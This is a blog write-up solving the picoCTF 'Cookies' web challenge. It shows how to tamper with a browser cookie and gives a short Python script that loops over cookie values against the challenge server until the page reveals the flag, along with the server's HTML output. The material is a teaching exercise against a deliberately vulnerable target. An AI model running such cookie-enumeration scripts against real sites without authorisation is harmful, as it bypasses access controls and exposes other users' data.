picoCTF Cookies
In this blogpost I’ll showcase how to solve the picoCTF Cookies challenge.
This challenge will be an easy one. All we need is a web browser and because of the fact that hackers are lazy people we’ll use a little python script for automation.
reconnaissance
First we need to open the link in the challenge description in our favorite browser:
A web form which asks us for a kind of cookies. But what is with the cookies this site is storing in our browser cache? Open the developer tools (F12) and take a look.
There is a cookie with the name ‘name’ and the value ‘-1’. Change the value of the cookie to 1 and reload the page:
Hmm… seems that the kind of cookie is stored in this value. You can try it with some other numbes to confirm it.
Automation
As mentioned above, hacker are lazy people so lets automate the boring stuff with a short python script:
# import the library for web requests
import requests
# define the url
url= "http://mercury.picoctf.net:27177/"
# iterate over the cookie values
for i in range(30):
cookies = { 'name' : str(i) }
# send the request with the crafted cookie to the server
r = requests.get(url, cookies=cookies)
# check if response contains the string 'flag'
if 'flag' in r.text.lower():
# if so, print out the response and stop the script
print(r.text)
break
This script iterates the cookie values from 0 to 29 and sends a request with that cookie to the server. If the response from the server contains the string ‘flag’ it prints out the content of the response and stops execution.
Save the script as ‘cookies.py’ for the sake of this post so that you’re able to run it from the command-line.
$ python cookies.py
<!DOCTYPE html>
<html lang="en">
<head>
<title>Cookies</title>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
<link href="https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<div class="header">
<nav>
<ul class="nav nav-pills pull-right">
<li role="presentation"><a href="/reset" class="btn btn-link pull-right">Home</a>
</li>
</ul>
</nav>
<h3 class="text-muted">Cookies</h3>
</div>
<div class="jumbotron">
<p class="lead"></p>
<p style="text-align:center; font-size:30px;"><b>Flag</b>: <code>picoCTF{xxxxxxxx}</code></p>
</div>
<footer class="footer">
<p>© PicoCTF</p>
</footer>
</div>
</body>
</html>
Im sure you’ll find the flag in the html code of the response, but if you are as lazy as I am, use the grep command in combination with this script and it is even simpler (remember: hackers are lazy):
python cookies.py | grep picoCTF{.*}
That’s it. As I promised this challenge was not too complicated and you definitly don’t have to be a sophisticated genius to solve it.
Please leave a comment how you liked my write-up on the picoCTF cookies challenge.